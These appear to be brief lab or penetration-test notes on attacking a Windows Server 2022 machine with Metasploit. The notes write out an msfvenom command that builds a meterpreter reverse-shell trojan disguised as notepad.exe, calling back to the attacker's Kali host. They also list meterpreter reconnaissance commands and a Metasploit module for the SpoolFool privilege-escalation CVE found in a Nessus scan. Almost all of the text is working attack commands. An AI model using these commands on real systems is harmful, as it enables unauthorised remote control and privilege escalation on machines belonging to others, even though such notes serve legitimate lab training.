Metasploit documentation https://docs.metasploit.com Metasploit Installation Folder in Windows: c:\metasploit-framework\bin This creates out trojan horse to execute on the Windows Server 22 box and names it notepad.exe and places it on our Kali desktop for transport: msfvenom -p windows/meterpreter/reverse_tcp -a x64 --platform windows -f exe LHOST=KALIBOX LPORT=4444 -o /home/kali/Desktop/notepad.exe This tells us who we are in meterpreter: getuid This tells us the system information: sysinfo The payload used against Windows Server 22 that was identified by CVE in the Nessus scan: use exploit/windows/local/cve_2022_21999_spoolfool_privesc CVE Details link: https://www.cvedetails.com/product/100693/Microsoft-Windows-Server-2022.html?vendor_id=26